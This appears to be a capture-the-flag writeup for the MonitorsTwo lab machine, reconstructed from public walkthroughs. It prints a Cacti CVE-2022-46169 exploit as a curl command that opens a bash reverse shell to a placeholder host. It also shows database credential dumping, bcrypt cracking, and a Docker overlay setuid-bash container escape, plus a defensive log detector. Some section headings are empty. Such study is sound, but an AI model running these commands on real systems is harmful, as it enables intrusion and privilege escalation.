monitorstwo

Linux · Easy · released 2023-04-29 · retired 2023-09-02

Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

MonitorsTwo is an Easy Linux box: CVE-2022-46169 Cacti 1.2.22 unauth RCE via remote_agent.php with X-Forwarded-For: 127.0.0.1 to bypass IP allowlist → www-data in container. Cacti DB has bcrypt for marcus → crack funkymonkey → SSH. Privesc: container-escape via CVE-2021-41091 (Docker 20.10.5) — set up SetUID bash inside the container, then exec it from the host through the container’s overlay path.

The chain:

  1. Cacti /remote_agent.php?action=polldata&... takes host_id, local_data_ids[] and poller_id from the request and splices them into a proc_open command line, so shell metacharacters in poller_id execute as www-data. Auth bypass: X-Forwarded-For: 127.0.0.1, since the IP allowlist trusts XFF.
  2. Shell as www-data inside Cacti container. MySQL local creds default root:root → dump user_auth → crack marcus’s bcrypt.
  3. SSH as marcus on host.
  4. The container's overlay diff dir on the host is owned by root but traversable by unprivileged host users (CVE-2021-41091, Docker 20.10.5). Inside the container, become root via the local capsh and chmod +s /bin/bash. On the host, run that setuid bash from the overlay diff path with -p → root.
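Added example (my own, not from the writeup or from Cacti): a small Python detector that flags, in Apache access logs, the two tells of step 1 above, a spoofed loopback X-Forwarded-For on remote_agent.php and non-integer poller_id/host_id values. It assumes a combined log format extended with the XFF header as one trailing quoted field; the sample lines are constructed.

```python
"""Detect CVE-2022-46169 exploitation attempts in Apache access logs. Constructed
example, not the writeup's code; assumes the combined log format plus one
trailing quoted field (LogFormat "... \"%{X-Forwarded-For}i\"")."""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$'
)
NUMERIC = re.compile(r'^\d+$')
LOOPBACK = ('127.', '::1')

def analyze(line):
    """Return the findings for one log line (empty list when benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m['url'])
    if not url.path.endswith('/remote_agent.php'):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    # remote_agent.php only serves pollers on the IP allowlist; a loopback
    # X-Forwarded-For on a request from a non-loopback source is the
    # allowlist bypass used in the chain above.
    if m['xff'].startswith(LOOPBACK) and not m['src'].startswith(LOOPBACK):
        findings.append('xff_loopback_spoof')
    # poller_id and host_id end up on a proc_open command line, so anything
    # other than a plain integer is a command-injection attempt.
    for key in ('poller_id', 'host_id', 'local_data_ids[]'):
        if any(not NUMERIC.match(v) for v in params.get(key, [])):
            findings.append('non_numeric_' + key.rstrip('[]'))
    return findings

def scan(lines):
    """Map the index of each suspicious line to its findings."""
    return {i: f for i, f in enumerate(map(analyze, lines)) if f}

# Constructed sample lines: a legitimate loopback poll, then an attempt with
# a spoofed XFF and %60id%60 (backtick-wrapped `id`) injected into poller_id.
SAMPLE_LOG = [
    '127.0.0.1 - - [29/Apr/2023:10:00:01 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&local_data_ids[]=1&host_id=1&poller_id=1 HTTP/1.1" '
    '200 512 "-" "curl/7.88.1" "-"',
    '10.10.14.5 - - [29/Apr/2023:10:05:42 +0000] "GET /cacti/remote_agent.php'
    '?action=polldata&local_data_ids[]=1&host_id=1&poller_id=%60id%60 HTTP/1.1" '
    '200 0 "-" "curl/7.88.1" "127.0.0.1"',
]
```

Feed it a real log with `scan(open(path).read().splitlines())`; a numeric poll from a non-allowlisted source without XFF is deliberately not flagged, since the allowlist itself handles that case.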

Recon

22/tcp     OpenSSH
80/tcp     Cacti 1.2.22

Foothold — CVE-2022-46169

curl 'http://10.10.11.211/cacti/remote_agent.php?action=polldata&local_data_ids[]=1&host_id=1&poller_id=`bash -c "bash -i >& /dev/tcp/<C2>/<p> 0>&1"`' \
   -H 'X-Forwarded-For: 127.0.0.1'
# www-data in cacti container
$ mysql -uroot -proot
mysql> select username, password from user_auth;
... marcus : <bcrypt>
$ hashcat -m 3200 hash rockyou.txt → funkymonkey
$ ssh marcus@10.10.11.211

Privesc — CVE-2021-41091 docker overlay

# In the Cacti container as root (via capsh / cap_setuid):
$ capsh --gid=0 --uid=0 --
# chmod a+s on bash in container
$ chmod +s /bin/bash

# As marcus on host: find the container's writable layer
$ find /var/lib/docker -name 'bash' -perm -4000 2>/dev/null
/var/lib/docker/overlay2/<id>/diff/bin/bash
$ /var/lib/docker/overlay2/<id>/diff/bin/bash -p
# root on host

Why each step worked

Counterfactuals

Source attribution

Reconstruction is grounded in:

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.
